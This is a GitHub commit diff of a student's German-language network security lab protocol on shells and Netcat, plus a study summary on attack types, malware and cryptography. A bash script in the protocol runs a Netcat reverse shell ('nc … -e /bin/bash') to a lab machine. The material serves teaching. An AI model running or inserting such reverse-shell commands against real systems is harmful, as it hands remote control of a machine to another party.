Skip to content

Commit

Permalink
protocol
Browse files Browse the repository at this point in the history
  • Loading branch information
DjakeDjone committed Apr 7, 2024
1 parent b748d98 commit fee44b0
Show file tree
Hide file tree
Showing 3 changed files with 52 additions and 13 deletions.
20 changes: 14 additions & 6 deletions content/nscs_protocol_10.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,16 +2,16 @@

# **Titel: Shells**

| **AufgabenNr:** | 9 |
| **AufgabenNr:** | 10 |
|---|:---|
| **Klasse:** | 3BHIF |
| **Name:** | Benjamin Friedl |
| **Gruppe:** | 2 |
| **Abgabetermin:** | 16.2.2024 |
| **Abgabedatum:** | 30.2.2024 |
| **Abgabetermin:** | 07.04.2024 |
| **Abgabedatum:** | 08.04.2024 |

## **Kurzbeschreibung:**
Übung 6 wiederholen und diesmal die VM des Hackers bearbeiten, damit sie die Paktete nicht blockt.
In diesem Protokoll wird auf die verschiedenen Shells und deren Funktionsweise eingegangen. Außerdem werden verschiedene Befehle und deren Verwendung erklärt. Abschließend wird auf das Tool Netcat eingegangen und dessen Verwendungsmöglichkeiten aufgezeigt.

---
\
Expand Down Expand Up @@ -50,7 +50,7 @@
1. [Chat-Tool](#chat-tool)
2. [File-Transfer-Tool](#file-transfer-tool)
3. [Shellzugriff](#shellzugriff)
\
4. [Netcat unter Windows](#netcat-unter-windows)
\
\
\
Expand Down Expand Up @@ -248,4 +248,12 @@ nc 10.140.0.3 3333 -e /bin/bash
```bash
#!/bin/bash
nc 10.140.0.3 3333 -e /bin/bash
```
```

## Netcat unter Windows
- Netcat ist auch unter Windows verfügbar aber nicht standardmäßig installiert
- Download: https://eternallybored.org/misc/netcat/
- Installation: `nc.exe` in `C:\Windows\System32` kopieren
- Es gibt auch eine GUI-Version von Netcat: https://sourceforge.net/projects/nc110/
- GUI-Version ist einfacher zu bedienen, aber weniger flexibel
- GUI-Version kann auch für Port-Scanning, Port-Forwarding, etc. verwendet werden
Binary file added content/nscs_protocol_10.pdf
Binary file not shown.
45 changes: 38 additions & 7 deletions content/nscs_summary.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,18 +2,37 @@


## Table of Contents
- [Network Security](#network-security)
- [Network Security Terms](#network-security-terms)
- [Hacking Tools](#hacking-tools)
- [Attack Types](#attack-types)
- [Viren, Würmer, Trojaner, Ransomware](#viren-würmer-trojaner-ransomware)
- [Kryptographie](#kryptographie)
- [Ziele von Verschlüsselung](#ziele-von-verschlüsselung)
- [Symmetrische Verschlüsselung](#symmetrische-verschlüsselung)
- [Asymmetrische Verschlüsselung](#asymmetrische-verschlüsselung)
- [TLS/SSL](#tlsssl)
- [Funktionsweise](#funktionsweise)
- [Versionen](#versionen)
- [CA](#ca)
- [Hashfunktionen](#hashfunktionen)
- [Digital Signatures](#digital-signatures)
\
\
\
---




# Network Security
## Network Security Terms
**Assets:**: alle Nutzer, Geräte u. Ressourcen eines Netzwerks
**Vulnerabilities:**: Schwachstellen, die von Angreifern ausgenutzt werden können
**Mitigation:**: Maßnahmen zur Reduzierung von Risiken
**Threats:**: Bedrohungen, die auf Assets einwirken
**Risk:**: Wahrscheinlichkeit, dass eine Bedrohung eintritt
**Exploit:**: Angriff, der eine Schwachstelle (Vulnerability) ausnutzt
- **Assets:**: alle Nutzer, Geräte u. Ressourcen eines Netzwerks
- **Vulnerabilities:**: Schwachstellen, die von Angreifern ausgenutzt werden können
- **Mitigation:**: Maßnahmen zur Reduzierung von Risiken
- **Threats:**: Bedrohungen, die auf Assets einwirken
- **Risk:**: Wahrscheinlichkeit, dass eine Bedrohung eintritt
- **Exploit:**: Angriff, der eine Schwachstelle (Vulnerability) ausnutzt


## Hacking Tools
Expand All @@ -30,11 +49,19 @@
- **Compromised Key Attack**: Angreifer hat Zugriff auf Schlüssel
- **Eavesdropping**: Abhören von Kommunikation (Sniffing)

## Viren, Würmer, Trojaner
## Viren, Würmer, Trojaner, Ransomware
- **Virus**: Programm, das sich in andere Programme einbettet und sich selbst repliziert (z.B. durch E-Mail-Anhänge)
- **Bootsektorvirus**: infiziert den Bootsektor einer Festplatte
- **Dateivirus**: infiziert Dateien
- **Makrovirus**: infiziert Makros in Dokumenten
- **Scriptvirus**: infiziert Skripte (z.B. JavaScript)
- **Wurm**: Programm, das sich selbstständig verbreitet (z.B. über Netzwerke)
- **Trojaner**: Programm, das sich als nützlich tarnt, aber Schadcode enthält (z.B. als legitime Software getarnt)
- **Ransomware**: Schadsoftware, die Dateien verschlüsselt und Lösegeld fordert
- **Crypto-Ransomware**: verschlüsselt Dateien
- **Locker-Ransomware**: sperrt den Zugriff auf das System

---
# Kryptographie
## Ziele von Verschlüsselung
- **Vertraulichkeit**: Schutz vor unbefugtem Zugriff
Expand Down Expand Up @@ -85,9 +112,13 @@ Beispiele: VeriSign, Thawte, Comodo
- **Einwegfunktionen**
- **Beispiel**: MD5, SHA-1, SHA-256
- **Verwendung**: Integritätsprüfung, Passwort-Hashing
- **Kollisionsresistenz**: zwei unterschiedliche Eingaben erzeugen unterschiedliche Hashwerte
- **Beispiel**: SHA-256 (256 Bit Hashwert)

## Digital Signatures
- **Signatur mit privatem Schlüssel**
- **Verifikation mit öffentlichem Schlüssel**
- **Authentifizierung und Integritätsschutz**
- **Beispiel**: RSA, DSA

---

0 comments on commit fee44b0

Please sign in to comment.